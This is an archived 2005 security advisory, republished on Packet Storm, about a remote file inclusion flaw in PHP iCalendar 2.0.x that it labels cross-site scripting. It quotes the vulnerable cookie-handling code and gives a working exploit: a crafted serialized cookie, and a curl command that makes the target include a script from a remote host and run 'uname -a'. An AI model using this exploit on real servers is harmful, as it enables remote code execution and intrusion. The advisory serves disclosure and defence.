exploit the possibilities

PHP iCalendar Cross Site Scripting

PHP iCalendar Cross Site Scripting
Posted Oct 27, 2005
Authored by Francesco Ongaro | Site ush.it

PHP iCalendar versions 2.0a2, 2.0b, 2.0c, and 2.0.1 are susceptible to a cross site scripting vulnerability. Exploitation details provided.

tags | exploit, php, xss
MD5 | f1a20e7ff53f7521b7f8098bdcf0dbac

PHP iCalendar Cross Site Scripting

Change Mirror Download
PHP iCalendar CSS

Name Cross-Site-Scripting Vulnerabilities in PHP iCalendar
Systems Affected PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1
Severity Medium Risk
Vendor http://www.phpicalendar.net
Advisory http://www.ush.it/2005/10/25/php-icalendar-css/
Additional (it) http://www.ush.it/team/ascii/hack-PHP-iCalendar/adv.txt
Author Francesco 'aScii' Ongaro (ascii at katamail . com)
Date 20051023

I. BACKGROUND

PHP iCalendar is a php calendar, more information is available at the
vendor site.

II. DESCRIPTION

PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong
input validation in index.php and will include an arbitrary file
ending with .php.

The vulnerable code is:

> config.inc.php

$printview_default = 'no';

> index.php

if (isset($_COOKIE['phpicalendar'])) {
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
$default_view = $phpicalendar['cookie_view'];
}

if ($printview_default == 'yes') {
$printview = $default_view;
$default_view = "print.php";
} else {
$default_view = "$default_view".".php";
}

include($default_view);

As you can see there is no input validation at all.

III. ANALYSIS

This vulnerability can be exploited using an hand-crafted cookie with
the right serialized array inside.

a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";}

curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook
ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.
ush.it%2Fteam%2Fascii%2F-----%22%3B%7D' -d 'user=uname -a'

IV. DETECTION

PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable.

V. WORKAROUND

Input validation or header location will fix the vulnerability.
PHP no remote fopen and open basedir will play also (if not..).

VI. VENDOR RESPONSE

Vendor fixed the bug in the cvs tree, not verified.

http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail1.txt
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail2.txt

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051023 Bug discovered
20051024 Working exploit written
20051025 Sikurezza.org notification
20051025 Initial vendor notification
20051025 Initial vendor response
20051025 Vendor CVS fix
20051025 Public disclosure

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco 'aScii' Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close